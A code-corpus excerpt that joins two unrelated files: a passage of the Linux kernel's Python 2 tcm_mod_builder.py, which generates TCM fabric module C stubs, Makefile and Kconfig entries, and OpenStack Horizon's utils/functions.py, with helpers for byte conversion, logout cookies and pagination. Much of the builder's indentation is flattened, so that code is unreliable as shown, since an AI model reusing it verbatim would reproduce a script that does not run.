buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (IS_ERR(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return PTR_ERR(fabric);\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!" + fabric_mod_name + "_fabric_configfs)\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
	try:
		p.write(buf)
	except IOError:
		tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
	process_fo = 0
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
			process_fo = 1
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
	try:
		p = open(f, 'w')
	except IOError:
		tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
	try:
		pi = open(fi, 'w')
	except IOError:
		tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!nacl) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('\*release_cmd\)\(', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
	try:
		p.write(buf)
	except IOError:
		tcm_mod_err("Unable to write f: " + f)
p.close()
	try:
		pi.write(bufi)
	except IOError:
		tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
	try:
		p = open(f, 'w')
	except IOError:
		tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
	try:
		p.write(buf)
	except IOError:
		tcm_mod_err("Unable to write f: " + f)
p.close()
return
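# For a hypothetical fabric_mod_name of "tcm_nab5000", the Makefile written
# above comes out as:
#   tcm_nab5000-objs := tcm_nab5000_fabric.o \
#                       tcm_nab5000_configfs.o
#   obj-$(CONFIG_TCM_NAB5000) += tcm_nab5000.o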
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
	try:
		p = open(f, 'w')
	except IOError:
		tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
	try:
		p.write(buf)
	except IOError:
		tcm_mod_err("Unable to write f: " + f)
p.close()
return
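# The same hypothetical module gets a Kconfig entry along the lines of:
#   config TCM_NAB5000
#           tristate "TCM_NAB5000 fabric module"
#           depends on TARGET_CORE && CONFIGFS_FS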
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
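# The two helpers above each append a single hook line, e.g. for the
# hypothetical module:
#   obj-$(CONFIG_TCM_NAB5000) += tcm_nab5000/
#   source "drivers/target/tcm_nab5000/Kconfig"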
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
	tcm_dir = os.getcwd()
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
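# Typical invocation (module name and protocol are illustrative):
#   ./tcm_mod_builder.py -m tcm_nab5000 -p iSCSI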
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
| gpl-2.0 |
Hodorable/0602 | horizon/utils/functions.py | 26 | 4693 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import decimal
import math
import re
from oslo_utils import units
from django.conf import settings
from django.contrib.auth import logout # noqa
from django import http
from django.utils.encoding import force_text
from django.utils.functional import lazy # noqa
from django.utils import translation
def _lazy_join(separator, strings):
return separator.join([force_text(s)
for s in strings])
lazy_join = lazy(_lazy_join, unicode)
def bytes_to_gigabytes(bytes):
# Converts the number of bytes to the next highest number of Gigabytes
# For example 5000000 (5 Meg) would return '1'
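    # Illustrative values, assuming oslo's units.Gi == 2**30:
    #   bytes_to_gigabytes(units.Gi)     -> 1
    #   bytes_to_gigabytes(units.Gi + 1) -> 2  (always rounds up)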
return int(math.ceil(float(bytes) / units.Gi))
def add_logout_reason(request, response, reason):
# Store the translated string in the cookie
lang = translation.get_language_from_request(request)
with translation.override(lang):
reason = unicode(reason).encode('utf-8')
response.set_cookie('logout_reason', reason, max_age=10)
def logout_with_message(request, msg, redirect=True):
"""Send HttpResponseRedirect to LOGOUT_URL.
`msg` is a message displayed on the login page after the logout, to explain
the logout reason.
"""
logout(request)
if redirect:
response = http.HttpResponseRedirect(
'%s?next=%s' % (settings.LOGOUT_URL, request.path))
else:
response = http.HttpResponseRedirect(settings.LOGOUT_URL)
add_logout_reason(request, response, msg)
return response
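# Illustrative call (the message text is made up):
#   return logout_with_message(request, "Your session has expired.")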
def get_page_size(request, default=20):
session = request.session
cookies = request.COOKIES
try:
page_size = int(session.get('horizon_pagesize',
cookies.get('horizon_pagesize',
getattr(settings,
'API_RESULT_PAGE_SIZE',
default))))
except ValueError:
page_size = session['horizon_pagesize'] = int(default)
return page_size
def get_log_length(request, default=35):
session = request.session
cookies = request.COOKIES
try:
log_length = int(session.get(
'instance_log_length',
cookies.get('instance_log_length',
getattr(settings,
'INSTANCE_LOG_LENGTH',
default))))
except ValueError:
log_length = session['instance_log_length'] = int(default)
return log_length
def natural_sort(attr):
return lambda x: [int(s) if s.isdigit() else s for s in
re.split(r'(\d+)', getattr(x, attr, x))]
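# Illustrative use; plain strings fall through getattr()'s default:
#   sorted(['host10', 'host9', 'host2'], key=natural_sort('name'))
#   -> ['host2', 'host9', 'host10']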
def get_keys(tuple_of_tuples):
"""Processes a tuple of 2-element tuples and returns a tuple containing
    the first component of each tuple.
"""
return tuple([t[0] for t in tuple_of_tuples])
